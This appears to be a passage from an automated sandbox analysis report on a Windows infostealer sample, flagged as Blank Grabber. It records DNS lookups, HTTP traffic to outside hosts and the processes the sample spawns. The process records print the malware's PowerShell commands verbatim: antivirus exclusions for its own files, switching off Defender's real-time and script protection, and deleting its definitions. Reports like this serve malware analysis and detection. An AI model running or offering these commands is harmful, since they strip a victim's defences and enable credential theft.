                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.232682943 CET192.168.2.91.1.1.10x345eStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.572330952 CET192.168.2.91.1.1.10x6329Standard query (0)clientsettings.roblox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:37.589793921 CET192.168.2.91.1.1.10x3948Standard query (0)www.nodejs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.700347900 CET192.168.2.91.1.1.10xd53Standard query (0)nodejs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:55.928215981 CET192.168.2.91.1.1.10x77acStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Oct 27, 2024 18:44:27.289382935 CET1.1.1.1192.168.2.90xacb4Name error (3)blank-8rmnx.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:29.820825100 CET1.1.1.1192.168.2.90xa398No error (0)getsolara.dev172.67.203.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:29.820825100 CET1.1.1.1192.168.2.90xa398No error (0)getsolara.dev104.21.93.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.528913021 CET1.1.1.1192.168.2.90x345eNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.580302000 CET1.1.1.1192.168.2.90x6329No error (0)clientsettings.roblox.comtitanium.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.580302000 CET1.1.1.1192.168.2.90x6329No error (0)titanium.roblox.comedge-term4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.580302000 CET1.1.1.1192.168.2.90x6329No error (0)edge-term4.roblox.comedge-term4-fra2.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:34.580302000 CET1.1.1.1192.168.2.90x6329No error (0)edge-term4-fra2.roblox.com128.116.123.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:37.598038912 CET1.1.1.1192.168.2.90x3948No error (0)www.nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:37.598038912 CET1.1.1.1192.168.2.90x3948No error (0)www.nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.708708048 CET1.1.1.1192.168.2.90xd53No error (0)nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:38.708708048 CET1.1.1.1192.168.2.90xd53No error (0)nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 27, 2024 18:44:55.936969042 CET1.1.1.1192.168.2.90x77acName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                            • getsolara.dev
                                                                                                                                                                                                                            • clientsettings.roblox.com
                                                                                                                                                                                                                            • www.nodejs.org
                                                                                                                                                                                                                            • ip-api.com

                                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.949769208.95.112.1807664C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Oct 27, 2024 18:44:30.538531065 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                            Oct 27, 2024 18:44:31.137918949 CET174INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Sun, 27 Oct 2024 17:44:30 GMT
                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                                                            Data Raw: 74 72 75 65 0a
                                                                                                                                                                                                                            Data Ascii: true


                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.949767172.67.203.1254437976C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-10-27 17:44:30 UTC81OUTGET /asset/discord.json HTTP/1.1
                                                                                                                                                                                                                            Host: getsolara.dev
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            2024-10-27 17:44:31 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Sun, 27 Oct 2024 17:44:31 GMT
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                            ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8"
                                                                                                                                                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zMwUJ68ai%2BsAJxN%2F1VPuoofgttEPwoK2E6xynsvcdnp5k%2BhB%2FaEVwxq3YOpwTSbLLKUXsST9N8Eo6naIspZKgSogcDyTFMijSCXaeXc13ROgM1BP3aXgkter4tv1Vdr9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=0
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8d947e9978d76c62-DFW
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2813&recv_bytes=695&delivery_rate=2468883&cwnd=242&unsent_bytes=0&cid=0f313bf74048c711&ts=581&x=0"
                                                                                                                                                                                                                            2024-10-27 17:44:31 UTC109INData Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
                                                                                                                                                                                                                            Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
                                                                                                                                                                                                                            2024-10-27 17:44:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.949785172.67.203.1254437976C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-10-27 17:44:34 UTC56OUTGET /api/endpoint.json HTTP/1.1
                                                                                                                                                                                                                            Host: getsolara.dev
                                                                                                                                                                                                                            2024-10-27 17:44:34 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Sun, 27 Oct 2024 17:44:34 GMT
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                            ETag: W/"58e4ee2ed9918060304a9212edaf09e7"
                                                                                                                                                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6QbEZ%2FxQVzeSD51L6TZPvbhWQHupkDfR%2FUO2FGbUoLKAGpllqYI415OLjzWEdBWZILMtS2w8av%2B2hFgTz0lyAoBydo5qd6LYOzCPCx84Xtt71DLcFn3PyoCVyY7ORe1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=0
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8d947ead8fe62e69-DFW
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1328&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2811&recv_bytes=694&delivery_rate=2187311&cwnd=251&unsent_bytes=0&cid=72cdfc802aee87ac&ts=186&x=0"
                                                                                                                                                                                                                            2024-10-27 17:44:34 UTC350INData Raw: 32 31 63 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 32 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 34 66 66 64 65 62 33 65 33 39 33 65 34 36 39 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 32 34 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 39 39 61 62 35 64 39 63 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73
                                                                                                                                                                                                                            Data Ascii: 21c{ "BootstrapperVersion": "1.22", "SupportedClient": "version-4ffdeb3e393e469e", "SoftwareVersion": "3.124", "BootstrapperUrl": "https://99ab5d9c.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
                                                                                                                                                                                                                            2024-10-27 17:44:34 UTC197INData Raw: 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 64 63 62 63 31 37 65 30 31 61 61 37 35 66 32 36 64 61 32 34 35 33 31 38 35 64 33 61 33 33 31 30 37 33 34 61 36 30 62 38 35 31 65 64 66 61 65 34 35 63 62 65 61 35 35 31 30 31 63 39 31 66 62 30 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 20 55 70 64 61 74 65 64 22 0a 7d 0d 0a
                                                                                                                                                                                                                            Data Ascii: tps://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"dcbc17e01aa75f26da2453185d3a3310734a60b851edfae45cbea55101c91fb0", "Changelog":"[+] Updated"}
                                                                                                                                                                                                                            2024-10-27 17:44:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            2192.168.2.949792128.116.123.44437976C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-10-27 17:44:35 UTC119OUTGET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
                                                                                                                                                                                                                            Host: clientsettings.roblox.com
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            2024-10-27 17:44:35 UTC576INHTTP/1.1 200 OK
                                                                                                                                                                                                                            content-length: 119
                                                                                                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                                                                                                            date: Sun, 27 Oct 2024 17:44:35 GMT
                                                                                                                                                                                                                            server: Kestrel
                                                                                                                                                                                                                            cache-control: no-cache
                                                                                                                                                                                                                            strict-transport-security: max-age=3600
                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                            roblox-machine-id: eb1c3008-1849-20c7-48c2-cc5773503727
                                                                                                                                                                                                                            x-roblox-region: us-central_rbx
                                                                                                                                                                                                                            x-roblox-edge: fra2
                                                                                                                                                                                                                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
                                                                                                                                                                                                                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                            2024-10-27 17:44:35 UTC119INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 34 38 2e 31 2e 36 34 38 30 37 38 33 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 34 66 66 64 65 62 33 65 33 39 33 65 34 36 39 65 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 31 2c 20 36 34 38 30 37 38 33 22 7d
                                                                                                                                                                                                                            Data Ascii: {"version":"0.648.1.6480783","clientVersionUpload":"version-4ffdeb3e393e469e","bootstrapperVersion":"1, 6, 1, 6480783"}


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            3192.168.2.949809104.20.23.464437976C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-10-27 17:44:38 UTC99OUTGET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
                                                                                                                                                                                                                            Host: www.nodejs.org
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            2024-10-27 17:44:38 UTC497INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                            Date: Sun, 27 Oct 2024 17:44:38 GMT
                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                            location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            x-vercel-id: cle1::xdccc-1730051078600-da22783cb291
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8d947ec7688d3aaa-DFW
                                                                                                                                                                                                                            2024-10-27 17:44:38 UTC20INData Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: fRedirecting...
                                                                                                                                                                                                                            2024-10-27 17:44:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:13:44:22
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff7ead00000
                                                                                                                                                                                                                            File size:8'240'610 bytes
                                                                                                                                                                                                                            MD5 hash:3C1B1F453E5F9F0D71F7862D2D6235FE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1393387910.000001C12B872000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1393387910.000001C12B874000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:13:44:23
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff7ead00000
                                                                                                                                                                                                                            File size:8'240'610 bytes
                                                                                                                                                                                                                            MD5 hash:3C1B1F453E5F9F0D71F7862D2D6235FE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1407872022.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'"
                                                                                                                                                                                                                            Imagebase:0x7ff7738f0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                            Imagebase:0x7ff7738f0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                                                                                                                                                                                                                            Imagebase:0x7ff7738f0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "start bound.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff7738f0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
